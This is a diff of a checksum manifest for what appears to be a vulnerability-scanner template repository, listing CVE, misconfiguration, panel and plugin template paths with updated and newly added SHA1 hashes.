helpers/wordpress/plugins/premium-addons-for-elementor.txt:06f1e9394396003ffa1e6b7ac8d848faba0ba8c3 -helpers/wordpress/plugins/pretty-link.txt:c02807771e1a750f51754b3494db53c68a5a7d94 +helpers/wordpress/plugins/pretty-link.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:155bc49c185468ac54a126a93c1e2b5921997fc1 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 @@ -403,7 +514,7 @@ helpers/wordpress/plugins/updraftplus.txt:b942f95288dbef535d6c4bd8ba4db5b1dea759 helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 +helpers/wordpress/plugins/w3-total-cache.txt:0c6799f2e85eccc7061443f76e45b7b268892b58 helpers/wordpress/plugins/webp-converter-for-media.txt:479e7dca067e6bab09a59b119f7c54a136587a83 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -424,7 +535,7 @@ helpers/wordpress/plugins/wordpress-seo.txt:6b07fbd06e719e91870fe311db76d2c482b6 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-fastest-cache.txt:a8ca9029438bddc6caceb1aae00246b568722654 helpers/wordpress/plugins/wp-file-manager.txt:463810c87a57507ca005dd6a19aab00e209bb4b7 -helpers/wordpress/plugins/wp-google-maps.txt:f593dd38154ae03f8ad23a9a3382622eee3e3bf4 +helpers/wordpress/plugins/wp-google-maps.txt:0a69f6911ff2e690d4b2523adc6f80e7d6b0de42 helpers/wordpress/plugins/wp-mail-smtp.txt:49845bdbd9ea8362a0f3bc2e6dad36c9121ce2d6 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 helpers/wordpress/plugins/wp-migrate-db.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 @@ -439,10 +550,10 @@ helpers/wordpress/plugins/wp-statistics.txt:2e3c072dacb785efa6a78df46e04b6abf58c helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-user-avatar.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e -helpers/wordpress/plugins/wpcf7-redirect.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f +helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 helpers/wordpress/plugins/wpforms-lite.txt:34c4874a9545ff46dc1d995437c2ee0879c54e33 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d874266be82e5e +helpers/wordpress/plugins/wpvivid-backuprestore.txt:7c522bb9ef8e9e38f71b7fc4ab4a0af3836c75df helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:8fb4537f45c70359a62b29c044ee196cd3454f82 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c @@ -469,6 +580,8 @@ http/cnvd/2021/CNVD-2021-17369.yaml:65beb26738c0a7a0b7ac10a854f9fd6650ccc084 http/cnvd/2021/CNVD-2021-26422.yaml:7aaf1149908731caaa93d8e0fb1e0eca9530051c http/cnvd/2021/CNVD-2021-28277.yaml:524a90b6c3bf5c2bb0b4dd821d384f1f98c80765 http/cnvd/2021/CNVD-2021-30167.yaml:4eb3fbb771c370b1e9d8f31b76c3b79a892779dc +http/cnvd/2021/CNVD-2021-41972.yaml:f254fd8ba373fa95a4744b259048d692ef081572 +http/cnvd/2021/CNVD-2021-43984.yaml:a02d85fe2f67fe05c67462dbea8fcb7dedcbc2cc http/cnvd/2021/CNVD-2021-49104.yaml:e676d4620da1cd57bc021c49d3d7c7821eada127 http/cnvd/2022/CNVD-2022-03672.yaml:e10e6a3a8c0c9527e640fcca1655186f039ce3e9 http/cnvd/2022/CNVD-2022-42853.yaml:b09d41d36a02b364b40898c724386b30d575af2f @@ -968,6 +1081,7 @@ http/cves/2018/CVE-2018-12634.yaml:97f1cfdcbed90fb7a31411006fdf658723d04193 http/cves/2018/CVE-2018-12675.yaml:22a40df123b30f46fd10da473215020c2a3791cf http/cves/2018/CVE-2018-1271.yaml:151efb498a9cd2aad7b7aacb5b37de5ee58327b5 http/cves/2018/CVE-2018-1273.yaml:5b87afb6192da9901417c7f9d9d0ef286ced97f2 +http/cves/2018/CVE-2018-12909.yaml:1419db77cb21559bbe19e4cc4eca4cf5c8275dda http/cves/2018/CVE-2018-12998.yaml:05880d1585240c7d2b744235a65126957833ed79 http/cves/2018/CVE-2018-1335.yaml:5b86c670cbc5b612963e0f62304f9504f970b6d8 http/cves/2018/CVE-2018-13379.yaml:1359999f23be6c6d94114f4a1d4e91d5cbf369ad @@ -1016,6 +1130,7 @@ http/cves/2018/CVE-2018-18608.yaml:11c471985c939bb113569900d36dc6539b6f1a57 http/cves/2018/CVE-2018-18775.yaml:27d22d6e651e771a3e3660ddeb3e8c08092b7c8c http/cves/2018/CVE-2018-18777.yaml:320f0f5bcd52004f83899fef362ef99d379f5510 http/cves/2018/CVE-2018-18778.yaml:3b5d9647173502652005c766bebbd56fee0c105e +http/cves/2018/CVE-2018-18809.yaml:785a7ad44a0d09128ff2abd3e8b578070b67dcb9 http/cves/2018/CVE-2018-18925.yaml:498b177f759a3ddde3e902f6234e85e824f1e777 http/cves/2018/CVE-2018-19136.yaml:dbd1e18154ab0ad6cbc7c9657d223e14b9829ed5 http/cves/2018/CVE-2018-19137.yaml:fbb0472e8dedfbca60c66a13eb7d32aace815602 @@ -1066,6 +1181,7 @@ http/cves/2018/CVE-2018-7467.yaml:23ada4871ce957b49f9e5c252244987a40bde1e1 http/cves/2018/CVE-2018-7490.yaml:e93fa5fb3a9e91d1ac01dba4749145eeb9a75b25 http/cves/2018/CVE-2018-7600.yaml:933802ea6d2c85fe805792ba35c2f58d6dfccc07 http/cves/2018/CVE-2018-7602.yaml:48a17f9a167a9d3849311bd21f0b88492f3d5e5d +http/cves/2018/CVE-2018-7653.yaml:dbcf206477385f26968093eb6a1217d868106fa7 http/cves/2018/CVE-2018-7662.yaml:96fae0e9203351425c2ca823e809f5887faaddd3 http/cves/2018/CVE-2018-7700.yaml:3f8650ee87c571398f324e78fe09ac165bc8c7c5 http/cves/2018/CVE-2018-7719.yaml:9e9b2cccbc6af6ba34cfeeb430b70e9c2595508d @@ -1138,6 +1254,7 @@ http/cves/2019/CVE-2019-15811.yaml:a426f0a679eacb10ac1e493b2111ee93b20b96c8 http/cves/2019/CVE-2019-15858.yaml:9548afb2b04483ce036dd3d6a557351e181ff430 http/cves/2019/CVE-2019-15859.yaml:12f3e9efb3f16c6076d21b0903b95dd8267e95a9 http/cves/2019/CVE-2019-15889.yaml:663437a3280f3bb361e802d414de1bcbbb6754b0 +http/cves/2019/CVE-2019-16057.yaml:d84ab085128ca20ed8a3026a3ed7a57fe63de8aa http/cves/2019/CVE-2019-16097.yaml:4ad590e1b47160f214cd2ea69ddf2b627dd65b3e http/cves/2019/CVE-2019-16123.yaml:833d19144df61171ceeccddb50a775b03d0bb340 http/cves/2019/CVE-2019-16278.yaml:18e2a25a922a95014b7c74e1204cff6fee67d1a3 @@ -1206,6 +1323,7 @@ http/cves/2019/CVE-2019-6340.yaml:ed1a02bf0e73e6fbc08dea0119c5f930471971ce http/cves/2019/CVE-2019-6715.yaml:45c1640d8469a8a749fedd7c93bbeac7490a5e82 http/cves/2019/CVE-2019-6799.yaml:b2a7f1f19ef09e8506ffd3d5e377567f90600df0 http/cves/2019/CVE-2019-6802.yaml:c9541edfa58fd9ff6c099d8ca29fb47866b72639 +http/cves/2019/CVE-2019-7192.yaml:4ec47a65ae6fc5c99b059966f308dc0cd1750026 http/cves/2019/CVE-2019-7219.yaml:a2da9306401358762f754694717c693139dfb634 http/cves/2019/CVE-2019-7238.yaml:52b2d6267b7735c92d24cdd393a794f6f2fe2734 http/cves/2019/CVE-2019-7254.yaml:8c808a17af2bdd5d1805b289214942d19b500eeb @@ -1236,7 +1354,7 @@ http/cves/2019/CVE-2019-9955.yaml:fb0832b1b18f1930d9d347d5e22f3ccdd9ae5117 http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 -http/cves/2020/CVE-2020-10199.yaml:9a25acb9bad311be433511f6ef601a4cc70f50c7 +http/cves/2020/CVE-2020-10199.yaml:78dd9d79772f51d38fd8d5422e9e5f7502a8b096 http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 @@ -1576,7 +1694,7 @@ http/cves/2021/CVE-2021-24407.yaml:930d2dc64468c8ee7d9aa5e71be9de535748b6ca http/cves/2021/CVE-2021-24435.yaml:89522ee18258ad0300e1bb5022d44880b1808787 http/cves/2021/CVE-2021-24436.yaml:b63bfee3cabf85be86e0559dc7dfa913491d57fd http/cves/2021/CVE-2021-24452.yaml:9d8db2861a445eff4ef21b5a784ff3e7aa639189 -http/cves/2021/CVE-2021-24472.yaml:12ab395fa49ed939490b6790b736abb36483ebbc +http/cves/2021/CVE-2021-24472.yaml:616084029cea76b6edd27c50e179d52f4d16cbff http/cves/2021/CVE-2021-24488.yaml:ae6777b8174869399f3d89b085bbcc20ef392ef2 http/cves/2021/CVE-2021-24495.yaml:484761ea40b28577aee44a0caed0863901524fc4 http/cves/2021/CVE-2021-24498.yaml:fc1264eba2f20f567ae8317d0bcb12fdccf327dc @@ -2039,6 +2157,7 @@ http/cves/2022/CVE-2022-23944.yaml:d9d019b4ae2d4f19d03f9f4a14babd56272bfcf2 http/cves/2022/CVE-2022-24112.yaml:d34021fc20a99f80ccebfec2f7fc3b6ad8033abb http/cves/2022/CVE-2022-24124.yaml:99e4c1abce61bf897197c8dbcda023fb9335f601 http/cves/2022/CVE-2022-24129.yaml:295cf475a2a171e30460dc0bfefea23b188dec6f +http/cves/2022/CVE-2022-2414.yaml:d3b98c7938a995086c756bf4e9643564d4b001f7 http/cves/2022/CVE-2022-24181.yaml:e9f5dfcb7eb017affad3d42c6d08005a81396252 http/cves/2022/CVE-2022-24223.yaml:84ee3c19af6211ad6b830fb6fe2f6cf3170cfac4 http/cves/2022/CVE-2022-24260.yaml:dc9c44eb66cf123111e5f2983b33902cea1dc509 @@ -2347,7 +2466,9 @@ http/cves/2023/CVE-2023-20888.yaml:df29cd30e3fe76946c2e0aacd563a25f1665b662 http/cves/2023/CVE-2023-20889.yaml:8b60fd0262fbec8c7e8e66f7e05d4d3f2adc8e04 http/cves/2023/CVE-2023-2122.yaml:b1d9f77dedde759ed31ecde571e1e5f961cb9f7d http/cves/2023/CVE-2023-2130.yaml:60ab68d072417d5d31b5d03c399196025f84750a -http/cves/2023/CVE-2023-2178.yaml:1db346cda0cee1d92f201268d957fa032d4cfca9 +http/cves/2023/CVE-2023-2178.yaml:efa11c92343544027f10593b7adcde5139d531fa +http/cves/2023/CVE-2023-22478.yaml:d2fc4bac89567133cbaad8b064d8634dafc6df7a +http/cves/2023/CVE-2023-22480.yaml:0d7604eb3512ff8cf33e5dad1e9d7a3fc8d7073c http/cves/2023/CVE-2023-2252.yaml:8e7b84e58291c374ae90358d336eb5115a7490a5 http/cves/2023/CVE-2023-22620.yaml:ed63a60eb6893b257eaa028d637ae2cb8663604b http/cves/2023/CVE-2023-2272.yaml:23e0a5d72fb10c5fbbed02fec5f2fd6ef4d60528 @@ -2453,6 +2574,8 @@ http/cves/2023/CVE-2023-3765.yaml:0edb8eb591f0b1307819257e7857613ba44f7b6e http/cves/2023/CVE-2023-38205.yaml:9716500ff3f3c2c4e3d84964f251ebdc29a2953d http/cves/2023/CVE-2023-3836.yaml:aee81a16198f116f8a2c42c889180f94667261ce http/cves/2023/CVE-2023-38646.yaml:67efb752090e5f27e0dc770008065458bbb2aba1 +http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 +http/cves/2023/CVE-2023-39143.yaml:470d4fc68ed1784cf1e3b644a7d694b0b62e5fb3 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -2476,6 +2599,7 @@ http/default-logins/apollo/apollo-default-login.yaml:e29e9d074df0b3924a5acfc795f http/default-logins/arl/arl-default-login.yaml:f449491ecb49f6eb89f974ecdf686ac041592b3e http/default-logins/audiocodes/audiocodes-default-login.yaml:8eebe238ed0b0ee2f1b5fdc0fa1e44393fffe0dc http/default-logins/azkaban/azkaban-default-login.yaml:280c8cd88baaf18d646f9e1a26f3ce74b15ffa33 +http/default-logins/bloofoxcms-default-login.yaml:6d0faf5b16348be86dff142f31c63f4d28b9fe78 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:766879d4ad001d95405eedbd6cf41a721d1ed965 http/default-logins/cobbler/cobbler-default-login.yaml:fa301242a42149b251f4e3333a74bb80d1da8919 http/default-logins/cobbler/hue-default-credential.yaml:fb8188153e9f64e9b549221b1c25033762c5c01f @@ -2594,6 +2718,7 @@ http/exposed-panels/3cx-phone-management-panel.yaml:3eb2d8154e573059858105e073f8 http/exposed-panels/3cx-phone-webclient-management-panel.yaml:c173a5d07730d8a785cdeb3cdb2a4fed0203a159 http/exposed-panels/3g-wireless-gateway.yaml:dcaa4b4174f979e21ea56852c9ad7d17c529e61a http/exposed-panels/acemanager-login.yaml:8b685c9f8f0e76eebfe441a0a0ee57ce06738a8e +http/exposed-panels/acenet-panel.yaml:10488ae76749f37d0cde339f9f327ea35246b5c1 http/exposed-panels/achecker-panel.yaml:827d13ad03b96e2a3450040ae565ad66694dc3fa http/exposed-panels/acrolinx-dashboard.yaml:bfa6ce62056cbbb2acbab68e346f516d06135660 http/exposed-panels/active-admin-exposure.yaml:585334ddf9c81b0a9ed265cf884def04705a330f @@ -2690,6 +2815,7 @@ http/exposed-panels/biotime-panel.yaml:6338c59d6c66c8b340736b2900e077fdfaf0a554 http/exposed-panels/bitdefender-gravityzone.yaml:f94198978febf9daf21b03ae09371a15a7fa3f2b http/exposed-panels/bitrix-panel.yaml:8023bf14b595d7a7df9e23b1f35193c988f36232 http/exposed-panels/black-duck-panel.yaml:77b6163f94f4c5731be0388c1d1b3a76d4fda54c +http/exposed-panels/bloofoxcms-login-panel.yaml:86230092537193247cd7756bd142fce4c6f5b9fd http/exposed-panels/blue-iris-login.yaml:300a2b4a3c7dad20f872637c95f9a60c411ac148 http/exposed-panels/bmc/bmc-discovery-panel.yaml:5aab943397c954f2e06ebc31c5f30b94c4f90955 http/exposed-panels/bmc-panel-detect.yaml:f73d80f848b1f1c81470a571f29f86313e833129 @@ -2799,6 +2925,7 @@ http/exposed-panels/dericam-login.yaml:3403129db0d7ce6db006c2d346abc4e0a86dfeed http/exposed-panels/digitalrebar-login.yaml:c77759032fa4cfb2e16d172ba96226909f92cd55 http/exposed-panels/directadmin-login-panel.yaml:409b49e557aa98d97ca95d19fcb7039a4a840258 http/exposed-panels/directum-login.yaml:e52dd3da095158a998e1915406852ac23af12035 +http/exposed-panels/discuz-panel.yaml:7abbae0dfa797f17aa1c9eae77e59d17a080a46b http/exposed-panels/django-admin-panel.yaml:09597c15781c7c9fa66a81c56cdbdc1a71775d86 http/exposed-panels/docebo-elearning-panel.yaml:4d2678ae2206f6daadff3b6d910fde5e7a9459e1 http/exposed-panels/dolibarr-panel.yaml:f81bb4e67b46c8071db9e24f0f4c48061eaa28e5 @@ -3011,6 +3138,7 @@ http/exposed-panels/kfm/kfm-login-panel.yaml:3c4000f0fb9e6faaab11f7701e4b79c4d49 http/exposed-panels/kibana-panel.yaml:bf1b2cf8320bd2445aecc31e79e8164e5b8b2cfc http/exposed-panels/kiwitcms-login.yaml:44a2f15c561bd5a7300a34a1f7e7536fddf9704f http/exposed-panels/kkfileview-panel.yaml:28b5ea59bab3179dd712606b3cbc169ec2326206 +http/exposed-panels/kodak-network-panel.yaml:4d858dab347a56ab3ae4b5cd853e2567680ff3ce http/exposed-panels/konga-panel.yaml:2751b288eaa3d48beb221bf0405d8a0170cc6e6d http/exposed-panels/kraken-cluster-monitoring.yaml:cad4a2449b89dd228223f9f3930213d037e0b9e4 http/exposed-panels/kronos-workforce-central.yaml:073b910ea0f7318d8998b79b8dc9bff7a2817239 @@ -3080,6 +3208,7 @@ http/exposed-panels/monitorix-exposure.yaml:70dcdd5f03cf2d14a4c03731ee17b7485ea0 http/exposed-panels/monstra-admin-panel.yaml:1391177a3426d2e574b89484a7038431269e6906 http/exposed-panels/movable-type-login.yaml:12b897f6affc955633419d6865b12442b64bbd6c http/exposed-panels/mpftvc-admin-panel.yaml:18895db09762ff1b99f12713d6f84e7a0564ea8b +http/exposed-panels/mpsec-isg1000-panel.yaml:6ba593c370a075718fb5d195afdc15afb3b78f95 http/exposed-panels/ms-adcs-detect.yaml:6cc131403ee22348fd2f229435e2cfb35b94a158 http/exposed-panels/mspcontrol-login.yaml:6787b3684e2320f8cc6d0eb5e16b0dda4f99aa9e http/exposed-panels/mybb/mybb-forum-install.yaml:3d6f3047c408a07b8f2435461ef7873d9c3791ca @@ -3754,6 +3883,7 @@ http/exposures/files/sensitive-storage-exposure.yaml:2e90d17dba6672057ac88ab8902 http/exposures/files/service-account-credentials.yaml:3e3a06a18bed6e7310a60b9c31a0a1b1ce0b693c http/exposures/files/shellscripts.yaml:9c1b07550699aa6950f6ef7ddffde953a6c1608d http/exposures/files/snyk-ignore-file-disclosure.yaml:1617a8d58cd0e67476ca0c5fe856b5d8acef7db5 +http/exposures/files/socks5-vpn-config.yaml:bae4ecdf2ee9b64b89eb63d1bb64a6b5369604e8 http/exposures/files/styleci-yml-disclosure.yaml:c15cab7ffb067a2c0307d80cc910e5c008eb789c http/exposures/files/svn-wc-db.yaml:f92f07cc8827cdff2d792ca47b159ae58ca2f686 http/exposures/files/symfony-properties-ini.yaml:f12a501782abe0fb30638a4ee7aeeb8529631dd6 @@ -4117,13 +4247,16 @@ http/misconfiguration/aws-redirect.yaml:4ed240934eb9c67becc2ab090ce768f9c05376c9 http/misconfiguration/aws-s3-explorer.yaml:960a58b92de23a0a68fbe88d8138e8bc045470d3 http/misconfiguration/aws-xray-application.yaml:d2e6d1d3565995c552f043c019de44a454e920ae http/misconfiguration/awstats-listing.yaml:cefec72eb3bf609f09779109eef39dfa9e62795b +http/misconfiguration/bitbucket-auth-bypass.yaml:689817c8f5989e7501fcfd9738d8039bc4994923 http/misconfiguration/bitbucket-public-repository.yaml:3ae328db3b76977394dca6df4b06d9d1a2402223 http/misconfiguration/blackbox-exporter-metrics.yaml:23bbd2929451b68aa7b0059bd18ba51643a41285 http/misconfiguration/bootstrap-admin-panel-template.yaml:01cca0503a1b23ed01e57d24b98bc4c1c67712f4 http/misconfiguration/bravia-signage.yaml:112b33d9332d3e80f0871c37adf7f3736d986d0f http/misconfiguration/browserless-debugger.yaml:a3a45ae884e34deb54c96476f31141b5338cd4f8 http/misconfiguration/cadvisor-exposure.yaml:7c087da24b9bab3e79ddabea84414c9f4b75fc28 +http/misconfiguration/casdoor-users-password.yaml:96ac1caebc9a6bc8201c528165755cfd314def1d http/misconfiguration/cgi-test-page.yaml:a4912db83100bdde0dd7e52454da25c7c716dbb3 +http/misconfiguration/clickhouse-unauth-api.yaml:429e4136878d2b2845288445d3b13929b145fb90 http/misconfiguration/clockwork-dashboard-exposure.yaml:e05c36e876b9bd13b7f444195bcd02e83068a3d0 http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e94 http/misconfiguration/cloudflare-image-ssrf.yaml:5cde64e35a786a2fed9498626ebaaea5429f7997 @@ -4289,6 +4422,7 @@ http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c1 http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927 http/misconfiguration/installer/wp-install.yaml:7263f4ac7377b12614b0480f0da9c47264a8854e +http/misconfiguration/installer/yzmcms-installer.yaml:444353079eddec6a26731f0f1834af2c6be6cf48 http/misconfiguration/installer/zenphoto-setup.yaml:9730edcaf481dd4e868f956e698001f4bdf268ed http/misconfiguration/internal-ip-disclosure.yaml:5b172cc1e7c7baa6ab5dfd5ac833c27175ebf020 http/misconfiguration/iot-vdme-simulator.yaml:20c893d91d0de38290ec70c12bb5003944c68f84 @@ -4414,6 +4548,7 @@ http/misconfiguration/slurm-hpc-dashboard.yaml:9a246fb5510d1f54acef4b6459d51484b http/misconfiguration/smarterstats-setup.yaml:eb3f0f9cdd11255b5ed687641638274f50529e15 http/misconfiguration/smokeping-grapher.yaml:ac670f706687c77b750a9c87c4c33d19b7fb5212 http/misconfiguration/solr-query-dashboard.yaml:6e2030ec31127bd6f7e33617bff53b2c78cccea9 +http/misconfiguration/sonarqube-projects-disclosure.yaml:cfc3aa5d5e0f62bc804741c8606fc0bf20382f57 http/misconfiguration/sonarqube-public-projects.yaml:e9486ffa86b355f1f55a8df80382304873664b0d http/misconfiguration/sony-bravia-disclosure.yaml:eb55d61f0b5fc907b2e5ca2796b80097279fabe7 http/misconfiguration/sound4-directory-listing.yaml:a42e79dbb8d265dc1c8ff6154995443b151bc659 @@ -5497,7 +5632,7 @@ http/technologies/prestashop-detect.yaml:d1d7044aeddb47830b4bcc461be50a6ef66aa5b http/technologies/projectsend-detect.yaml:0fc088308432bac5879d6d7688a737b0bb2a2cf3 http/technologies/prtg-detect.yaml:febc67d4ab8496a0b8bbf435d7e7613678836085 http/technologies/puppet-node-manager-detect.yaml:2924aa577fc52f283605b5b22d33d59780f9bf7e -http/technologies/puppetdb-detect.yaml:892db35c87ed6c7d08cf30cf540c4df810e6442c +http/technologies/puppetdb-detect.yaml:904453a29729011ad113e744ae1cca0dfdc1e76d http/technologies/puppetserver-detect.yaml:e9264ce1e31f3e1d706b4c712ef05eeb932ebc8c http/technologies/pypiserver-detect.yaml:0639f781b6c6224d8fc521c847c3bfba5e5df9d2 http/technologies/redcap-detector.yaml:8b7087c247848dd70271ccdc04815919e650850c @@ -5757,7 +5892,7 @@ http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbb http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-google-maps.yaml:f2f4afa59a5450b81aebf668215d5659c9efc663 http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e @@ -6048,6 +6183,7 @@ http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:d2c2b49be9bad9fd0753c090a86c4aa http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:15e280ee1d7344056e946fd7f25420ab1346992f http/vulnerabilities/avtech/avtech-verification-bypass.yaml:9497012b89ada0ee6f48be0af32ef2033ec8a47a http/vulnerabilities/backdoor/jexboss-backdoor.yaml:2b4e3596c572a9d4429e1f23d90251d082d0fc89 +http/vulnerabilities/bsphp-info.yaml:9cd24e3775c993c85fea60e5499f2195e1d2ed23 http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:8af1618f2246b3de340bb45ca72b6d8b864836a8 http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:4d6b0c0c843d1f53d635bdf06533cf90c409c5b9 http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:e83c7299fb5fa09709f46b540fa9a8f8273348c4 @@ -6061,6 +6197,7 @@ http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:079f7c526b753b2eff94c http/vulnerabilities/dedecms/dedecms-openredirect.yaml:d18f0f25b3f707f155997fc3a110916a5dcc5eeb http/vulnerabilities/dedecms/dedecms-rce.yaml:a8cd8335a29316ab09cd3261656db490f9671636 http/vulnerabilities/deos-open500-admin.yaml:63ac4937a413f49d1505817f8e9fc0511f63b9c3 +http/vulnerabilities/discuz/discuz-api-pathinfo.yaml:444702cfa9a835c2be5c9c85b4551a2441ad5102 http/vulnerabilities/drupal/drupal-avatar-xss.yaml:9209fbd5943d02081ba5021aacb2ad48a2435efe http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:ef76ddb5d08455550aed9bf6374b498336f70676 http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:bb939ed5879a96bfe1d7a21002713721b0e0e5e0 @@ -6119,6 +6256,7 @@ http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml:2c518a580f881d8c http/vulnerabilities/jira/jira-unauthenticated-screens.yaml:cb84bd816e411ccabe0b240da3f406e8521caa07 http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:8751cd9b769aa5cee9312c5a20d1a2d28d00e195 http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45bb507acf04d5411b6bd65cf +http/vulnerabilities/joomla/joomla-department-sqli.yaml:8973142a0b5898a703c053e2960dfad1bcec33b3 http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:9b35d1764a2220c1e4640f8ea0ffcecbe31b57d2 http/vulnerabilities/joomla/rusty-joomla.yaml:243d584db6ce05f2d2e43b09daa10eae5ff6a085 http/vulnerabilities/jupyter-notebook-rce.yaml:92676b19b8b57d1039df60dd120022030d31aa9a @@ -6133,6 +6271,8 @@ http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:b7996ee696b7e034a http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:d6a9b4d056a672a3775099bb09c116df0cd7e3f9 http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:bd20aafab7a73674df1f7c9e5a9aa245604acfcc http/vulnerabilities/moodle/moodle-xss.yaml:e1bd6593e9607f34bf2bfbdbb66457d8e3414c49 +http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml:3c1292d109834fc30f0ba09fd8c32ee992b34185 +http/vulnerabilities/netmizer/netmizer-data-listing.yaml:dcc8c105783d5a12f1cebcfb7ba14a17699ba727 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:9e9a31fe009519cd70e31db31439f39402d5efd8 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:24bc1d31c3907a2dee1d372bad94baacbd069b7f http/vulnerabilities/nps/nps-auth-bypass.yaml:4d10c4d4199f3e410f50b641926d81ed455c2fb6 @@ -6150,6 +6290,7 @@ http/vulnerabilities/other/WSO2-2019-0598.yaml:df55470aa07ec9e95302b08810aed2034 http/vulnerabilities/other/academy-lms-xss.yaml:da37dbfd84f6335eedc3484d58093c08ea08eb91 http/vulnerabilities/other/accent-microcomputers-lfi.yaml:fb8fd5c58a72fd879efa965d24cac4dcebb158b2 http/vulnerabilities/other/acme-xss.yaml:b292b0c0d7777a5315f06993a42056b1cb03b27f +http/vulnerabilities/other/acti-video-lfi.yaml:a06189fd9ae35d197d6f66faae91eea5013333db http/vulnerabilities/other/aerocms-sqli.yaml:65ddeaac3c3c25208e60dce7e39afeb45ddbc7cc http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:c97780044dd4078b77a6834381e07c43914a380d http/vulnerabilities/other/alumni-management-sqli.yaml:650cbd6f515fdcc2e66a3ea8b346f9c6367ed20b @@ -6157,6 +6298,8 @@ http/vulnerabilities/other/antsword-backdoor.yaml:93db1ae5508bca36eb0b8805353de9 http/vulnerabilities/other/asanhamayesh-lfi.yaml:0367c44590e30835f28a54e844817074b2c767ea http/vulnerabilities/other/aspnuke-openredirect.yaml:ab64189daa0a4907f91b5755fa710adef228f9be http/vulnerabilities/other/avada-xss.yaml:a87437e1cff6ab3fab62d590aedbe29557192743 